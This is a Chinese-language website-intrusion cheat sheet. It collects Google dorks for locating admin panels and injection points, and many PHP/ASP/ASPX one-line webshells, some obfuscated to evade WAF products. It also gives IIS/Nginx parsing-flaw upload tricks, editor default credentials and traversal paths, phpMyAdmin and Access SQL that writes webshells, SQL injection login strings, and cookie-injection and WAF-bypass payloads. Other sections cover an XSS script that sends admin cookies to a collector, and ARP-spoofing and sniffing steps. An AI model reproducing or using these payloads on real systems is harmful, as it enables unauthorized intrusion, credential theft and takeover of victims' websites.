渗透笔记大全整理

  • 内容
  • 相关
0x01 常见的网站程序
 
asp类的:
foosun(风讯)
kesion(科汛)newasp(新云)
乔客CreateLive(创力)
5uCMSKingCMS
DvBBS(动网)
BBSxp[博客]zblog
[博客]pjblog
 
PHP类的:
DeDeCms(织梦)
ECMS(帝国)
PHPCMS
PHP168
HBcms(宏博)SupeSite
CMSware(思维)Joomla!
[BBS]Discuz!
[BBS]phpWind[SNS]UCenterHome
[SNS]ThinkSNS[商城]EcShop
[商城]ShopEx[博客]WordPress
[维基]HDWiki
[微博]PHPsay[DIGG]PBdigg
 
php开源mysql绝对路径
开源系统 数据库配置文件名 文件名所在的目录

Discuz! config.inc.php ./ config.inc.php

Phpcms config.inc.php ./include/config.inc.php

Wodpress wp-config.php ./ wp-config.php

Phpwind sqlconfig.php ./data/sqlconfig.php

phpweb config.inc.php ./config.inc.php

Php168v6 mysql_config.php ./php168/ mysql_config.php

Shopex config.php ./config/config.php

Ecshop config.php ./data/config.php

Joomla configuration.php ./ configuration.php

UCenter config.inc.php ./data/config.inc.php

EmpireCMS config.php ./e/class/config.php

Dedecms common.inc.php .data/common.inc.php

Zen Cart configure.php ./includes/configure.php

Mediawiki localsettints.php ./config/localsettints.php

Ecshop config.php ./data/config.php

osCommerce configure.php ./includes/configure.php
 
 
0x02 谷歌语法 
 
site:可以限制你搜索范围的域名.

inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用.

intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题、URL等的文字)

intitle: 查包含关键词的页面,一般用于社工别人的webshell密码

filetype:搜索文件的后缀或者扩展名

intitle:限制你搜索的网页标题.

link: 可以得到一个所有包含了某个指定URL的页面列表.

查找后台地址:site:域名 
inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms

查找文本内容:site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username

查找可注入点:site:域名 inurl:aspx|jsp|php|asp

查找上传漏洞:site:域名 inurl:file|load|editor|Files

找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit

存在的数据库:site:域名 filetype:mdb|asp|#

查看脚本类型:site:域名 filetype:asp/aspx/php/jsp

迂回策略入侵:inurl:cms/data/templates/images/index/

网络设备关键词:intext:WEB Management Interface for H3C SecPath Series
 
 
0x03 一句话木马
 
asp一句话木马:<%eval request(“x”)%>

php一句话木马:<?php eval($_POST[g]);?>

aspx一句话:<%@ Page Language=”Jscript”%><%eval(Request.Item[“x”],”unsafe”);%>

网站配置、版权信息专用一句话:”%><%Eval Request(x)%>

一句话再过护卫神:<%Y=request(“x”)%> <%execute(Y)%>

过拦截一句话木马:<% eXEcGlOBaL ReQuEsT(“x”) %>

asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><%

能过安全狗的解析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg

突破安全狗的一句话:<%Y=request(“x”)%> <%eval(Y)%>

elong过安全狗的php一句话:<?php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[cc]); ?>

后台常用写入php一句话(密码x):

<?

$fp = @fopen(“c.php”, ‘a’);

@fwrite($fp, ‘<‘.’?php’.”\r\n\r\n”.’eval($_POST[x])’.”\r\n\r\n?”.”>\r\n”);

@fclose($fp);

?>

高强度php一句话:

<?php substr(md5($_REQUEST[‘heroes’]),28)==’acd0’&&eval($_REQUEST[‘c’]);?>

新型变异PHP一句话(密码b4dboy):

($b4dboy = $_POST[‘b4dboy’]) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

突破安全狗的aspx一句话:

<%@ Page Language=”C#” ValidateRequest=”false” %>

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“你的密码”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object { this }, null, null); } catch { }%>

突破护卫神,保护盾一句话:

<?php $a = str_replace(x,””,”axsxxsxexrxxt”);

$a($_POST[“test”]); ?>

许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。

改成:〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉

这样就避开了使用〈%%〉,保存为.ASP,程序照样执行的效果是一样的。

PHP高强度一句话:

<?php substr(md5($_REQUEST[‘x’]),28)==’acd0’&&eval($_REQUEST[‘c’]);?> 菜刀连接:/x.php?x=lostwolf 脚本类型:php 密码:c

<?php assert($_REQUEST[“c”]);?> 菜刀连接 躲避检测 密码:c
 
 
0x04 解析漏洞总结
 
IIS 6.0

目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码

IIS6.0 会将 xx.jpg 解析为 asp 文件。

后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)

IIS6.0 都会把此类后缀文件成功解析为 asp 文件。

默认解析:/xx.asa /xx.cer /xx.cdx

IIS6.0 默认的可执行文件除了 asp 还包含这三种

此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

IIS 7.0/ IIS 7.5/ Nginx <8.03

在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。

常用利用方法: 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾

e.g.

copy xx.jpg/b + yy.txt/a xy.jpg

/b 即二进制[binary]模式

/a 即ascii模式 xx.jpg正常图片文件

yy.txt 内容 <?PHP fputs(fopen(‘shell.php’,’w’),'<?php eval($_POST[cmd])?>’);?>

意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件

找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可执行恶意文本。

.然后就在图片目录下生成一句话木马 shell.php 密码 cmd
 
 
0x05 ewebeditor编辑器
 
默认后台:ewebeditor/admin_login.asp

帐号密码:admin admin

样式设计:ewebeditor/admin_style.asp

查看版本:ewebeditor/dialog/about.html

数据库路径:db/ewebeditor.mdb db/%23ewebeditor.mdb db/%23ewebeditor.asp ewebeditor/db/[email protected]#ewebeditor.asp (用谷歌语法找文件名)

遍历目录:ewebeditor/admin/upload.asp?id=16&amp;d_viewmode=&amp;dir =../..

跳转目录:ewebeditor/admin_uoloadfile.asp?id=14&dir=.. (dir为列目录, ..为返回上层目录),形式:dir ../..

点上传文件管理-随便选择一个样式目录,得到:ewindoweditor/admin_uoloadfile.asp?id=14 在id=14后面加&dir=../../../.. 就可看到整个网站的文件了(../自己加减)

( ewebeditor5.5版本 )

默认后台:ewebeditor/admin/login.asp

帐号密码:admin 198625

数据库路径:data/%23sze7xiaohu.mdb

遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

调用样式上传页面:ewebeditor/ewebeditor.htm?id=body&style=popup

( ewebeditor3.8 php版本 )

默认后台:eWebEditor/admin/login.php

首先随便输入一个帐号和密码,接着系统会提示出错,这时清空浏览器的url,然后输入以下代码后连按三次回车键:

javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));

接着访问文件:ewebeditor/admin/default.php 就可以直接进入后台了。

( ewebeditor编辑器exp手册 )

有时候什么后缀都上传了,还是不行。就增加一个asp:jpg格式 上传asp:jpg 试试

一:文件上传成功了,但是访问不成功,说明该目录(比如:/UploadFile)被设置了权限,返回去换成/ 上传到根目录就行了.增加asp等不行的时候,可以利用解析asp;jpg

二:下载数据库查看前人留下的痕迹,再访问上传页面拿shell。

页面路径:/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已添加asp|asa|cer|php的栏目,把S_ID跟S_Name的值替换在语句里访问,上传相对应的格式木马。
 
 
0x06 fckeditor编辑器
 
查看版本:fckeditor/editor/dialog/fck_about.html

编辑器页面:FCKeditor/_samples/default.html

上传页面:fckeditor/editor/filemanager/connectors/test.html

遍历目录:
FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

编辑页面:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

查看文件上传路径:
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

( 拿shell方法总结 )

ASPX的站几乎都用fck编辑器,建议用工具扫一下,记住inc目录下可能存在fck编辑器,扫下这个目录。

一:如果是iis6.0,上传两次 1.asp;.jpg 或者1.asp;1.jpg 或者创建x.asp目录,再在这个目录下上传x.jpg 或者直接上传1.asp;jpg 都可以完美解析拿下shell

二:第一次上传1.asp;1.jpg,被重命名为:1_asp;1.jpg,但是第二次上传1.asp;1.jpg,就有可能变成:1.asp;1(1).jpg

三:iis7.5+fck的解析文件为:a.aspx.a;.a.aspx.jpg..jpg.aspx

四:如果不是iis6.0 上传1.asp;jpg然后抓包,接下来改包,将分号变成空格,再用c32把20改成00,保存,利用 截断分号两次

五:成功访问别人的一句话木马页面,http://xx.com/UploadFiles\EditorFile\file/2.asp;2(1).jpg 但不知道密码

http://xx.com/UploadFiles\EditorFile\file\2_asp;2.jpg 这个是图片木马,没有成功利用iis6.0解析漏洞还是图片,下载下来用记事本打开找到密码。

六:IIS7.0/7.5 通杀oday,把php一句话木马后缀改成1.jpg传上去,找出一句话的路径后,在1.jpg的后面添加/.php 例如:http://www.xxx.com/iges/php.jpg/.php

( 建立文件夹 . 变 _ 的突破方法 )

利用Fiddler web debugger 这款工具来进行修改数据包,从而达到突破的目的。

注意:安装Fiddler web debugger,需要安装.net环境以及.net的SP2补丁方可运行!

1.打开fck的上传页面,例如:
2.fckeditor/editor/filemanager/browser/default/connectors/test.html

3.再打开Fiddler web debugger这款工具,点击设置–自动断点–选择 “请求之前”

4.接着打开fck的上传页面,创建文件夹,并输入你想要创建的文件名,例如:x.asp

5.然后返回到Fiddler web debugger这款工具里,选择链接–点击右侧的嗅探

6.修改currentfolder内的参数,改成你要建立的文件夹名字,如:x.asp

7.然后点击右侧的:run to completion

8.再点击软件设置–自动断点–禁用,再到浏览器里点击确定建立文件夹,你就会发现文件夹建立为x.asp了。
 
 
0x07 linux
 
解析格式:1.php.xxx (xxx可以是任意)

如果apache不认识后缀为rar的文件,我们就用1.php.rar格式上传,文件就会被服务器当做PHP脚本解析。

辨别linux系统方法,例如:http://www.xxx.com/xxx/abc.asp?id=125 把b换成大写B访问,如果出错了,就说明是linux系统,反之是windows系统.
 
 
0x08 旁注
 
旁注的技巧就是挑选支持aspx的站来日,这样提权时候希望较大,如何探测服务器上哪些站点支持aspx呢? 利用bing搜索:http://cn.bing.com/ 搜索格式:ip:服务器ip aspx

比如要入侵一个网站,想知道该网站支不支持aspx,就在网站后面随便加上一个xxx.aspx回车,如果显示的不是iis默认的错误页面,而是这种:“/”应用程序中的服务器错误,说明支持aspx马。
 
 
0x09 phpmyadmin
 
查看版本:test.php 或 phpinfo.php

默认账号密码:root root

万能帐号密码:’localhost’@’@” 密码空

拿shell第一种方法:

CREATE TABLE mysql.darkmoon (darkmoon1 TEXT NOT NULL );

INSERT INTO mysql.darkmoon (darkmoon1 ) VALUES (‘<?php @eval($_POST[pass]);?>’);

SELECT darkmoon1 FROM darkmoon INTO OUTFILE ‘d:/wamp/www/darkmoon.php’;

DROP TABLE IF EXISTS darkmoon;
拿shell第二种方法:

Create TABLE moon (darkmoon text NOT NULL);

Insert INTO moon (darkmoon) VALUES(‘<?php @eval($_POST[pass]);?>’);

select darkmoon from moon into outfile ‘d:/wamp/www/darkmoon2.php’;

Drop TABLE IF EXISTS moon;
拿shell第三种方法:

select ‘<?php @eval($_POST[pass]);?>’INTO OUTFILE ‘d:/wamp/www/darkmoon3.php’

拿shell第四种方法

select ‘<?php echo \'<pre>\’;system($_GET[\’cmd\’]); echo \'</pre>\’; ?>’ INTO OUTFILE ‘d:/wamp/www/darkmoon4.php’

127.0.0.1/darkmoon4.php?cmd=net user
找到mysql数据库,执行sql语句即可写入一句话,再菜刀连接即可。

phpmyadmin脱裤:在这里面是可以直接拖库的,如同上传php拖库脚本一样,操作差不多的。

修改mysql默认的root用户名方法:

进入phpmyadmin,进入mysql表,执行sql语句

1.update user set user=’你的新root用户名’ where user=’root’;

2.flush privileges;

例如:

用root身份登入,进入mysql库,修改user表即可。

1.use mysql;
2.mysql>update user set user=’newName’ where user=’root’;

3.mysql> flush privileges;
 
 
0x10 万能密码
 
( php )

帐号:’ UNION Select 1,1,1 FROM admin Where ”=’

密码:1

( asp )

‘xor

‘or’=’or’

‘or”=”or”=’

‘or ‘1’=’1’or ‘1’=’1

‘or 1=1/*
 
 
0x11 批量关键词
 
inurl:asp?id=

inurl:detail.php?

CompHonorBig.asp?id= 很不错的的一个搜索注入点

inurl:show.asp? 非常强大

site:www.yuming.com

inurl:articleshow.asp?articleid=数字

inurl:szwyadmin/login.asp

inurl:asp?id=1 intitle:政府

杭州 inurl:Article_Class2.asp?
 
 
0x12 安全狗
 
1.过注入

方法一:a.asp?aaa=&id=sql语句

方法二: a.asp?id=sql语句 里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin

2.过大马被阻拦访问

方法一:上传一个大马 然后访问http://sss.com/dama.asp ; 访问后出现拦截。

那么解决方法 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!–#include file=”dama.jpg” –> 这样再访问da.asp 就不会被拦截了。

3.过菜刀连接一句话被拦截

方法一:不用菜刀连接一句话,用别的一句话连接端。

方法二:中转下连接菜刀,把过滤掉的词替换掉。
 
 
0x13 本地构造上传漏洞 

寻找程序上传漏洞,必须从上传页面的源文件入手,目标有两个:

1.filename (文件名称) 在上传页面中针对文件扩展名过滤不严,从而上传可执行的脚本木马。

2.filepath (文件路径) 在上传页面针对路径过滤不严,导致可以修改上传相对路径上传脚本木马。

当检测到一个上传页面,asp、asa后缀已经被过滤掉的时候,可以尝试抓包明小子或NC上传!

不行就利用本地上传漏洞构造上传!例如上传页面是:http://www.xx.com/upfile_other.asp

1.右键查看源文件,找到这段代码:<form name=”form1″ method=”past” action=”zwhua_upload1.asp” enctype=”multipart/form-data”>

把以上代码中actino处的路径补全!即:<form name=”form1″ method=”past” action=”http://www.xxx.com/zwhua_upload1.asp” enctype=”multipart/form-data”>

2.再找到这段代码:<input type=”hidden” name=”filepath” value=”uploadfile/”>

利用IIS6.0解析漏洞,把以上代码中value处的文件补全!即:<input type=”hidden” name=”filepath” value=”uploadfile/1.asa; “> 注意:冒号后面有空格!

3.接着保存为1.html,将刚保存的文件拖进去C32里,选择十六进制模式,找到“1.asa; ”后面的空格,将其填充为00后保存退出!

4.本地打开上传图片格式的木马(不成功时可以尝试上传一句话木马) ,如果提示成功后不显示路径的话,可以右键查看源文件自己手工找出路径访问即可!


0x14 利用双文件上传拿shell

因为网站只判断一次,如果第一个文件后缀是在白名单里面的话,就让其上传,并没有判断第二个文件,所以上传任意格式的文件也让其通过。

当系统验证cookie的时候,就要用到火狐浏览器了,登录网站进后台,让火狐浏览器保存管理员的cookie值,再把修改后的“双文件上传工具”拖进去上传。

1.在后台找上传点,右键查看源文件,找到上传地址,一般在post或action的附近,搜索即可找到,一般为:src=”../xxx.htm” 之后补全路径访问。

2.这个还不是真正的上传页面,真正的上传页面后缀是asp的,继续查看源代码,找到action=”xxx.asp”,补全路径访问即可!

4.其实也可以抓包从而获得上传路径,抓包之后,在Referer:这栏,还有常见的是:htto://www.xxxx.com/upfile_other.asp

3.打开双文件上传工具,替换为当前的上传地址,保存后拖进火狐浏览器里,第一个选择jpg木马,第二个选择cer木马,提交后右键查看源文件找出路径即可。


0x15 数据库备份抓包改包NC提交拿shell

当备份路径不能修改,后缀又是mdb不变的时候,我们可先对备份的过程进行抓包,再本地构造用NC提交即可突破备份,数据库恢复也可使用此方法!

在抓包的时候,最好用火狐浏览器,因为有的浏览器抓不到包,首先上传一张图片木马复制下地址,接着对备份过程进行抓包!把抓到的数据复制在文本里面!

开始本地修改,先把POST处补全网址,找到最底下的一行数据,再复制多一行对比长度进行修改,把备份的数据名称替换为木马地址,备份的名称改为自己想要的asp后缀!

再将原来的数据长度跟现在的对比同时替换掉,最后看一共增加了多少个字符,就在Content-Length:处进行增减,用NC提交数据格式:nc 域名 80<1.txt


0x16 本地构造数据库备份突破拿shell

当上传jpg木马得到路径前去备份时,发现数据库备功能用不了的情况下,可以尝试本地构造突破拿shell!

首先查看源文件,找到“当前数据库路径”修改为刚上传jpg木马的路径,再找到“数据库备份名称”修改为1.asa

找到“<form method=”past” action=”Backup.asp?action=Backup”>” 将路径补全“<form method=”past” action=”http://xxx.com/admin/Backup.asp?action=Backup”>”

最后保存为1.html,有的网站不验证cookie的话,直接打开进行备份就能成功了,但是一般都需要验证cookie,这时就用上火狐浏览器了。

因为火狐浏览器有保留cookie的功能,先登录后台,以管理员的权限进行上传,直接把1.html拖进火狐浏览器里,直接点击备份即可突破cookie验证!


0x17 本地构造限制上传类型漏洞

一般用于直接扫到的上传页面,名称是:上传图片,上传asp、asa等脚本时提示“请选择jpg或gif文件!”

这时通过这个方法一般都能成功,首先保存到本地1.asp 放到小旋风的目录下,然后找到以下这段代码:

alert(“请点击浏览按钮,选择您要上传的jpg或gif文件!”)

myform.file1.focus;

return (false);

}

else

{

str= myform.file1.value;

strs=str.toLowerCase();

lens=strs.length;

extname=strs.substring(lens-4,lens);

if(extname!=”.jpg” && extname!=”.gif”)

{

alert(“请选择jpg或gif文件!”);

看到这句代码:if(extname!=”.jpg” && extname!=”.gif”) 改为: if(extname!=”.jpg” && extname!=”.gif” && extname!=”.asp”)

然后补充完整上传地址,action=这里,然后网页打开127.0.0.1 直接上传asp文件就可以了。


0x18 抓包改包NC提交拿shell

1.抓包数据中如果存在name=”filepath”或是name=”filename”,那么就可以满足NC的上传条件了。

2.将木马的抓包数据复制到文本文件中。例如:1.txt

3.将路径补全:

filepath截断法:

uploadfile/路径后添加1.asp空格 (16进制下面将20改为00)

filename自定义名称:

C:\Documents and Settings\lei\桌面\1.jpg (将1.jpg 改为 1.asp空格,16进制下将20改为00)

3.在Content-Length处加上../uploadfile/后增加的字节数。

4.用C32将空格的20改为00,保存为1.txt。

5.把1.txt跟nc.exe放在同一目录下,cmd命令:nc -vv www.XXXX.com 80<1.txt

( 如果上传成功后没有将木马解析成asp,可以尝试将文件名改成asa、cer、php 再不行就用IIS 6.0解析漏洞,将文件名改为1.asa;1.jpg )


0x19 抓包nc上传获取管理权限 

这个方法相当于cookie欺骗,首先到前台去注册一个会员,注册成功后在登录的那一刻,用抓包工具进行抓包,把抓到的数据复制到1.txt里面。

接下来打开,把双引号里棉的数据“X-Forwarded-For: 127.0.0.2’,group_id = 1 where loginname = ‘会员的帐号’#” 放在Content-Length:的下面。

在看到最底下的loginname=这行代码,把最后面的验证码改成当前会员登陆的验证码,然后将nc\1.txt 放在同一个目录下,cmd命令:nc 域名 80<1.txt

成功提交上去后,刚才的会员帐户将变成管理员帐户了,找到该站的后台地址登录即可实现cookie欺骗!


0x20 cookie欺骗 

当我们通过注入或是社工把管理员的帐号跟md5密码搞到手的时候,却发现破解不出密码 (MD5是16位加密的)

那么我们就可以用COOKIE欺骗来绕过,利用桂林老兵的cookie欺骗工具,把自己的ID以及md5密码都修改成管理员的,再修改cookie,访问时就会实现欺骗了。


0x21 cookie中转突破防注入

有时检测一个网站,系统会弹出一些SQL防注入的提示框,这时我们可以利用COOKIE中转注入来进行突破,首先准备一个webshell,然后打开COOKIE中转工具。

复制注入点到“注入URL地址跟来源页”处,把问号去掉,再把问号后面的ID=剪切到“注入键名”里,再把ID=后面那个参数剪切到“POST提交值”里替换jmdcw=后面的参数。

点击生成,再把生成的文件上传到webshell里,然后访问路径,再页面地址后面加“?jmdcw=参数”,这样搭建构造出来的注入点就绕过防注入了!

以上是在webshell里搭建ASP坏境的方法,下面的是本地架设ASP环境的方法:

利用简易IIS服务器搭建一个环境,再将COOKIE中转生成的文件放到简易IIS服务器的目录下!然后运行简易IIS服务器,在后面+文件名+问号+jmdcw=参数即可。


0x22 cookie手工突破防注入

第一种方法:

用 and 1=1 and 1=2 检测网站是否存在注入点时,如果提示你的IP已被记录,就说明系统做了防注入措施,可以用代码来突破。

管理员只过滤了and,但是没有过滤or,我们可以先猜网站的字段数 格式:order by 数字 猜到错为止,然后选前一个对的数字!

比如猜到14错误,那就是13了,然后利用Cookie提交变量值,代码:javascript:alert(document.cookie=id=”+escape(“这里填写变量值,例如:id=408”));

开始猜解表段,代码:javascript:alert(document.cookie=”id=”+escape(“变量值 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin”));

复制在浏览器里打开,将出现一个提示框,点击确定就会注射进去,再重新打开网站(要在此处打开,所以前面最好复制下网站地址)

然后就会出现两个提示数字,比如5跟6,然后在代码的5跟6处猜帐号密码,常见的帐号有:user username 密码:pass password

复制修改后的代码放到浏览器里打开,就会爆破出网站的帐号密码了。

第二种方法:

注入点:http://www.XXXXXXXX.gov.cn/shownews.asp?id=4098

首先把?id=408去掉,然后访问如果提示“数据库出错”!就说明网站没有过滤Cookie提交方式,可以利用Cookie欺骗绕过防注入!

利用Cookie提交变量值,代码:javascript:alert(document.cookie=”id=”+escape(“4098”)

下面开始在Cookie注入中执行常规注入攻击,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and 1=1”));

访问http://www.XXXXXXXX.gov.cn/shownews.asp 显示正常页面,

再提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and 1=2”)); 显示错误页面!

下面来开始猜解表段,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select * from 表段)”));

接着猜字段,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select 字段 from admin)”)); 例如:username

接着猜字段,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select 字段 from admin)”)), 例如:password

下面开始猜字段数跟字段内容了,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and 1=2 union select 1,2,3,4,5,6 from 表段”));

一直猜解到对为止,这里只是猜到6,记得继续加减!猜解到对的时候,页面会出现数字,然后在相对应的数字替换字段名,再进行提交代码!

这时如果字段名猜对的话,就会爆出帐号密码了,不对的话继续替换字段名,位置不变!(存在cookie注入时建议参考mysql手工注入的语句)


0x23 伪静态注入

伪静态网站注入方法,通常情况下,动态脚本的网站的url类似下面这样:

http://www.91ri.org/news.php?id=111

做了伪静态之后就成这样了:

http://www.91ri.org/news.php/id/111.html

以斜杠“/”代替了“=”并在最后加上.html,这样一来,就无法直接用工具来注入了。

常规的伪静态页面如下:http://www.XXX.com/play/Diablo.html

例如关联的动态页面是game.php ,那么当用户访问后程序会自动转换成类似http://www.XXX.com/game.php%3F ... iablo 的形式

注入点检测可以用:http://www.XXX.com/play/Diablo’ and 1=’1.html与http://www.XXX.com/play/Diablo’ and 1=’2.html来判断

通常情况下,动态脚本的网站的url类似下面这样:http://www.xxoo.net/aa.php?id=123

做了伪静态之后类似这样:http://www.xxoo.net/aa.php/id/123.html 以斜杠“/”代替了“=”并在最后加上.html,这样一来,就无法直接用工具来注入了!


0x24 嗅探 

当入侵一个网站,该网站没有任何漏洞的情况下,可以进行旁注,再提权拿下任意一台服务器,不行的话就C段,提权拿下任意一台服务器。

只要能拿下同网段的任意一台服务器,就可以使用C段嗅探来获取主站的帐号密码,cain是一款强大的劫持工具。

在服务器里安装cain后打开主控端,点击配置->选择服务器IP一项->在路由追踪一项取消全部->确定。

设置完毕后点击一下激动按钮(中间那个),再点击嗅探器,点击加号符号,选择所有在子网主机,选择ARP测试(传播 31-位),确定。

扫描完毕选择网关一项,点击ARP,点击加号符号,左边选择网关,右边选择全部的C段,确定,点击开始嗅探按钮(第三个),嗅探到的帐号密码在口令一项展现!

如果发现没数据可以使用幻境网盾来限制网速,让cain的发包快过防火墙。


0x25 arp欺骗

只要该服务器存在C段,都可以尝试arp欺骗,用到的工具是NetFuke,想知道arp劫持能不能成功,cmd命令:arp -a 看一下,动态的服务器IP就能成功,静态的就不能。

安装完运行主控端,设置–嗅探设置–网卡选择服务器的IP–控制选项选择“启用ARP欺骗、启用过滤器、启用分析器、启用修改器、主动转发” 确定。

设置–ARP欺骗–双向欺骗–来源Ip填服务器的网关–中间人IP填服务器的IP–目标IP填要欺骗的任意C段ip(用御剑扫描C段)–确定。

插件管理–修改器–最后一个选项双击–在右边的HTML Body = [haha!!] 填写自己要展现的文字,点击开始即可欺骗成功!


0x26 突破安全狗防注入及上传

1.写入webshell 写不进去,平常的一句话 也失效,用这段代码:

<%@ Page Language=”C#” ValidateRequest=”false” %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“admin163.net”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object { this }, null,null); } catch { }%>

连接端用cncert的aspx一句话客户端

2.IIS6.0解析漏洞遇到安全狗

文件名为http://www.baicai.com/1.asp;1.jpg

这样的会被IIS安全狗果断屏蔽

改成如下名称,IIS6一样会解析:

www.baicai.com/;1.asp;1.jpg

3.安全狗的注入绕过

常用的如baicai.asp?id=1 and 1=1 是会被安全狗屏蔽的。

但这样就可以突破了:

baicai.asp?0day5.com=.&id=69%20 and 1=1


0x27 跨站xss

在网站留言或者能输入信息的地方提交跨站代码,从而盗取管理员cookie,然后用cookie浏览器直接进入后台,将以下代码保存为asp文件,例如1.asp<%

thisfile=Server.MapPath(“cookie.txt”)

msg=Request(“msg”)

set fs=server.CreateObject(“scripting.filesystemobject”)

set thisfile=fs.OpenTextFile(thisfile,8,True,0)

thisfile.WriteLine(“=======cookie:”&msg&”======by:剑眉大侠”)

thisfile.close

set fs=nothing

%>

首先搭建一个asp环境,推荐使用“ASP服务器(摆脱安装IIS)” 再将1.asp放在wwwroot目录下,访问1.asp文件如果提示下载,则说明搭建成功了。

然后在留言板的“您的网站”一处输入:<script>doucument.location=’http://127.0.0.1/1.asp?msg=’document.cookie</script>

当管理员浏览我们提交的留言时,将在wwwroot目录下生成一个cookie.txt文件,这时我们只要访问cookie.txt这个文件,就能知道管理员的cookie是多少了!

然后再使用桂林老兵的cookie欺骗工具或是网页源代码查看分析器,访问网站再输入cookie进行欺骗登录即可!(填cookei的时候记得选择自定义)

小技巧:要想让管理员早点浏览你提交的留言,可以通过打电话,QQ客服等去社工他即可。


0x28 爆库

%5C为十六进制的\符号,而数据库大于5.0就可以爆库,若一个网站数据库大于5.0,且是ACESS数据库,若不能注入的注入点是:http://www.xxx.com/rpc/show24.asp?id=127

我们直接把%5C加到rpc后面,因为%5C是爆二级目录,所以应该是这样,http://www.xxx.com/rpc%5c/show24.asp?id=127

而%23是代表#,如果管理员为了防止他人非法下载数据库,而把数据库改成#database.mdb,这样防止了。

如果页面地址为:http://www.xx.com/rpd/#database.mdb ; 把%23替换#就可以下载了,即:http://www.xx.com/rpd/%23database.mdb

还有利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 如果没有修改默认的数据库路径,也可以得到数据库的路径(注意:这里的/也要换成%5c)

如果你能看到:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。

这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.


0x29 利用sql注入点判断网站和数据库是否站库分离 

在注入点后加上:and exists(select * from admin where 1=(Select (case when host_name()[email protected]@servername then 1 else 0 end)))

注意admin一定要是存在的表段,如果返回正常,说明网站和数据库是在同一服务器,如果不正常则说明是站库分离的。


0x30 iis6.0 PUT写入漏洞 

利用工具:IIS PUT Scaner、桂林老兵IIS写权限利用程序

1、IIS来宾用户对网站文件夹有写入权限

2、web服务器扩展力设置webDAV为允许,即:WebDAV—打勾

3、网站主目录:写入—打勾(可PUT)

4、网站主目录:脚本资源访问—打勾(可COPY、MOVE)

大家都清楚,写权限就是允许PUT,与网站自身运行的权限无丝毫联系,如果开启了,就是没有一点安全意识,就给我们提供了大大的方便。

首先用御剑工具扫下C段,比如:12.12.12.1 – 12.12.12.255 打开IIS PUT Scaner,把12.12.12.1放在Start IP 这里,12.12.12.255放在End IP 这里,

接着在Port这里,换成80,点击Scan开始嗅探,当PUT这里显示是Yes就说明存在漏洞,可以右键选择PUT file,输入文件名1.txt,下面填内容,保存就可以写入了。

或是利用“桂林老兵IIS写权限利用程序”也可以,这款工具比较强大,把域名填写进去,例如:www.xxx.com,然后在请求文件那里输入你的文件名,

在数据包格式那里选择PUT,有的会直接弹出浏览文件框,没有就自己选择,在下面,然后点击提交数据库即可,一般是先PUT一个txt文件,再MOVE成asp木马。

直接提交asp木马的话,如果MOVE方法不行,可以试试Copy。


0x31 ACCESS执行SQL语句导出一句话拿webshell

原理大致和php网站的outfile差不多,在access后台其他方法不能拿到webshell,但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了。不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式,我们导出为EXCEL后在利用IIS解析漏洞就可以变成我们的木马了。

点“服务器信息探测”,获得网站路径:e:\web\webshellcc\的EXCEL 点“系统管理”-》“自定义执行SQL”,试一下,能够执行的话可以用access导一句话拿下shell。

create table cmd (a varchar(50)) 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50

insert into cmd (a) values (‘<%execute request(chr(35))%>’) 在表cmd的a字段插入密码为#的一句话木马

